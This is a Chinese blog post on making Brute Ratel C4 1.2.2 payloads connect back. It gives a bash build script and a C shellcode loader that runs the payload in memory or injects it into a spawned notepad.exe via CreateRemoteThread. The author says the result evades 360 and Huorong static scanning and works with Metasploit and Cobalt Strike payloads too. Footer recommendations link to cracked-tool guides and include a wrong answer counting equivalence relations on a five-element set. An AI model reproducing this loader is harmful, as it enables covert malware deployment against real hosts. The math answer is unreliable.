brc4 1.2.2生成exe无法回连解决方法

已于 2024-03-05 15:50:01 修改
阅读量265 收藏
点赞数 3
文章标签: web安全
于 2024-03-05 13:33:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/136476048
版权

brc4 1.2.2生成exe无法回连解决方法
将生成的bin文件转换为exe即可
贴码

bincompiler.sh

#!/bin/bash

if [ $# -lt 3 ]; then
    echo "需要提供 shellcode 二进制文件进行编译。例如: binCompiler.sh 86/64 <shellcode.bin> <output.exe>"
else
    if [ ! -f "$2" ]; then
        echo "路径不存在: $2"
    else
        cp "$2" shellcode.bin -rf
        xxd -i shellcode.bin > shellcode.h
        if [ "$1" = "86" ]; then
            echo "正在编译 x86"
            i686-w64-mingw32-gcc runshellcode.c -o "$3" -lws2_32
        else
            echo "正在编译 x64"
            x86_64-w64-mingw32-gcc runshellcode.c -o "$3" -lws2_32
        fi
        echo "+ 成功"
        rm -rf shellcode.bin shellcode.h
    fi
fi

runshellcode.c

#include <windows.h>
#include <stdio.h>
#include <winternl.h>
#include "shellcode.h"

int main(int argc, char* argv[]) {
    if (argc == 1) {
        DWORD lpThreadId = 0;
        DWORD flOldProtect = 0;
        LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        memcpy(addressPointer, shellcode_bin, shellcode_bin_len);
        VirtualProtect(addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
        ((void(*)())addressPointer)();
        WaitForSingleObject((HANDLE)-1, -1);
    } else {
        STARTUPINFOA sinfo = {0};
        sinfo.cb = sizeof(sinfo);
        PROCESS_INFORMATION pinfo = {0};
        if (CreateProcessA(NULL, "notepad.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo)) {
            LPVOID addressPointer = VirtualAllocEx(pinfo.hProcess, NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
            WriteProcessMemory(pinfo.hProcess, addressPointer, shellcode_bin, shellcode_bin_len, 0);
            printf("pid: %lu\n", pinfo.dwProcessId);
            printf("Allocated: %p\n", addressPointer);
            DWORD tID = 0;
            DWORD flOldProtect = 0;
            VirtualProtectEx(pinfo.hProcess, addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
            getchar();
            CreateRemoteThread(pinfo.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addressPointer, NULL, 0, &tID);
            printf("tID: %lu\n", tID);
        }
    }
    return 0;
}

使用方法:将两个文件放在同一个文件夹下

binCompiler.sh 86/64 <shellcode.bin> <output.exe>

实际效果:生成的exe可以过360和火绒静态检测,过不了360动态检测,可以正常上线

当然了,通过msf或者cobaltstricke生成的bin文件也可以使用该方法进行转换,但是要注意系统位数。

注意:需要安装xxd

天下是个小趴菜
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
brc global standard food issue 4 - checklist
01-01
俗话说国以民为本,民以食为天,食品的生产、安全、质量均需要相应的食品资料知识累积与...该文档为brc global standard food issue 4 - checklist,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看看
Sony出新款BRC-Z700高清CMOS彩色摄像机
11-29
BRC-Z700搭载了3片1/4英寸的晶锐ClearVid CMOS传感器,每片传感器的有效像素高达1,000,000,这使得它在低光照环境下依然能保持高清晰度和高灵敏度。同时,它能够同时输出高清和标清视频信号,适应不同场合的需求。 ...
BRC4工具1.2.2入门教程学习
qq_60717291的博客
09-21 3245
BruteRatel_1.2.2入门教程学习
Brute Ratel C4红队框架 brc4 1
2401_84281588的博客
04-28 740
将刚刚的破解文件到brc4根目录 并选择替换 将原来的文件替换掉执行一下命令看看是否破解成功,如果能正常启动就说明破解成功了,并且还可以连接没破解成功它会提示 Enter activation key: 或者 License is invalid or expired接下来我们结束服务,进入adhoc_scripts目录下运行,生成证书ps:此处生成证书可以跳过然后挨个执行执行genssl.sh时 需要自定义这些。
Brute Ratel C4红队框架 brc4 1(1)
m0_57472099的博客
05-16 652
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Brute Ratel C4红队框架 brc4 1.2.2入门使用教程(注册机使用)
m0_55751267的博客
05-13 5258
目前brc4貌似越来越火,相比之下cs用的越来越少了,但是不管是外网还是国内,关于brc4的在野破解版1.2.2的中文教程没有多少,虽然他和cs相似。
基于BRC的不平衡文本情感分类的样本切割方法
03-03
基于BRC的不平衡文本情感分类的样本切割方法
BRC全球标准消费品管理体系办法
07-01
BRC全球标准消费品管理体系办法
BRC 减速机选型手册.pdf
05-06
BRC 减速机选型手册
云WAF | 云waf保护你的网络安全
weixin_62641226的博客
07-11 403
云waf是一种灵活而有效的网络安全手段,可以有效地提高网络的安全性能。灵活、可扩展:云计算中的 WAF是以云计算的方式提供的,具有灵活、可伸缩的特点,可以根据实际需要对防护性能进行动态调整。易于部署:云 WAF相对于传统的硬件防火墙,在不增加硬件配置及网络配置的情况下,部署起来更方便、更灵活。实时的威胁信息:云端 WAF能够及时地对各种新型的网络攻击手段做出反应,并能及时地响应当前的威胁信息。自动化程度高:云计算 WAF具有自动分析海量资料的能力,并且能够为您的应用提供最好的防护措施。
医疗器械网络安全 | 漏洞扫描、渗透测试没有发现问题,是否说明我的设备是安全的?
网 安 云
07-10 670
尽管漏洞扫描、模糊测试和渗透测试在评估系统安全性方面是非常重要和有效的工具,但即使这些测试没有发现任何问题,也不能完全保证您的医疗器械是绝对安全的。网安云,目针对医疗器械海外国内注册、变更推出网络安全解决方案,专业安全专家与法规研究团队对国内、美国、欧盟等国家医疗器械注册网络安全要求进行深入钻研,为客户定制化网络安全方案,帮助客户为设备注册、上市出具符合法规要求的网络安全文件。综上所述,虽然漏洞扫描、模糊测试和渗透测试是评估医疗器械安全性的重要手段,但它们并不能完全保证系统的安全。医疗器械网络安全顾问。
等保测评助力网络安全治理现代化
最新发布
waitaikong_的博客
07-14 217
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
如何做好漏洞扫描工作提高网络安全
dexunyun的博客
07-11 875
漏洞扫描工具,作为网络安全领域的重要工具之一,其工作原理主要通过自动化技术对目标系统(包括网络设备、应用程序、数据库等)进行全面扫描,识别并报告可能存在的安全漏洞和弱点。通过采取预防和防范措施,降低安全风险,优化安全管理,提升自身的网络安全防护能力,从而可以更好地实现数字化转型的目标。选择合适的工具:根据企业的实际需求(如扫描范围、扫描深度、报告质量等)选择合适的漏洞扫描工具。涵盖多种类型资产扫描,支持云内外网站和主机扫描,支持内网扫描、智能关联各资产之间的联系,自动发现资产指纹信息,避免扫描盲区。
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 437
申请IP地址SSL证书
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1292
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全法视角下的等保测评法律责任与风险控制
ddcajdkdl的博客
07-11 475
直接责任人员处罚:对于违反网络安全法规定,导致严重后果的,不仅单位要承担责任,直接负责的主管人员和其他直接责任人员也可能被处以罚款,甚至追究刑事责任。该法于2017年6月1日正式实施,其中对网络安全等级保护制度(简称“等保”)做出了明确规定,要求网络运营者根据其网络的重要程度及潜在影响,实施相应级别的安全保护措施。综上所述,从《网络安全法》的角度出发,等保测评不仅是法律规定的强制性要求,也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。
网络安全——防御实验
Nirvana92的博客
07-09 1117
# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示: ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目,先为办公区做**安全策略**主要策略有以下几点: 1、书写名称和描述,名称和描述要**明确**,让除本人
网络安全筑基篇——XSS、XML、XXE
weixin_55762309的博客
07-10 880
XSS、XXE、XML的区别
在离散数学中,集合A为{1,2,3,4,5}它有多少个等价关系
05-21
在集合A={1,2,3,4,5}中,定义一个关系R为等价关系,必须满足以下三条性质: 1. 自反性:对于任意的a∈A,都有aRa; 2. 对称性:对于任意的a,b∈A,如果aRb,则bRa; 3. 传递性:对于任意的a,b,c∈A,如果aRb且bRc,则aRc。 根据等价关系的定义,我们知道等价关系将集合A划分为若干个等价类,即每个等价类由满足以下条件的元素组成: 1. 同属于A; 2. 对于任意的a,b∈A,有a和b在同一个等价类中当且仅当aRb。 因此,我们可以通过寻找等价类的数量,来确定等价关系的数量。 在集合A中,可以发现有如下等价类: 1. {1} 2. {2} 3. {3} 4. {4} 5. {5} 6. {1,2} 7. {1,3} 8. {1,4} 9. {1,5} 10. {2,3} 11. {2,4} 12. {2,5} 13. {3,4} 14. {3,5} 15. {4,5} 16. {1,2,3} 17. {1,2,4} 18. {1,2,5} 19. {1,3,4} 20. {1,3,5} 21. {1,4,5} 22. {2,3,4} 23. {2,3,5} 24. {2,4,5} 25. {3,4,5} 26. {1,2,3,4} 27. {1,2,3,5} 28. {1,2,4,5} 29. {1,3,4,5} 30. {2,3,4,5} 31. {1,2,3,4,5} 因此,集合A中共有31个等价关系。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值